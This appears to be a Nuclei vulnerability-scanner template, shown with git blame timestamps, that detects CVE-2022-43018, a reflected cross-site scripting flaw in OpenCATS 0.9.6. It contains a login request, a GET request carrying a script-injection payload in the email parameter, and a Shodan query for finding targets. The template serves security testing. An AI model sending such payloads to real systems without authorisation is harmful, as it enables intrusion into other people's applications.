nuclei-templates/cves/2022/CVE-2022-43018.yaml

53 lines
1.4 KiB
YAML
Raw Normal View History

2022-10-24 12:50:28 +00:00
id: CVE-2022-43018
info:
2022-10-25 08:49:36 +00:00
name: OpenCATS v0.9.6 - Cross Site Scripting
2022-10-24 12:50:28 +00:00
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.
reference:
2022-10-24 20:12:53 +00:00
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
2022-10-25 08:49:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-43018
2022-10-25 09:31:03 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-10-25 09:31:03 +00:00
cve-id: CVE-2022-43018
cwe-id: CWE-79
2022-10-24 20:12:53 +00:00
metadata:
shodan-query: title:"OpenCATS"
verified: "true"
2022-10-25 08:49:36 +00:00
tags: cve,cve2022,xss,opencats,authenticated
2022-10-24 12:50:28 +00:00
requests:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-10-25 08:49:36 +00:00
username={{username}}&password={{password}}
2022-10-24 12:50:28 +00:00
- |
2022-10-25 12:16:24 +00:00
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1
2022-10-24 12:50:28 +00:00
Host: {{Hostname}}
2022-10-25 12:16:24 +00:00
host-redirects: true
max-redirects: 2
2022-10-24 12:50:28 +00:00
cookie-reuse: true
matchers-condition: and
matchers:
2022-10-24 20:12:53 +00:00
- type: word
part: body
words:
2022-10-25 12:16:24 +00:00
- '</script><script>alert(document.domain)</script>:0'
2022-10-24 12:50:28 +00:00
- type: word
2022-10-24 20:12:53 +00:00
part: header
2022-10-24 12:50:28 +00:00
words:
2022-10-24 20:12:53 +00:00
- "text/html"
- type: status
status:
- 200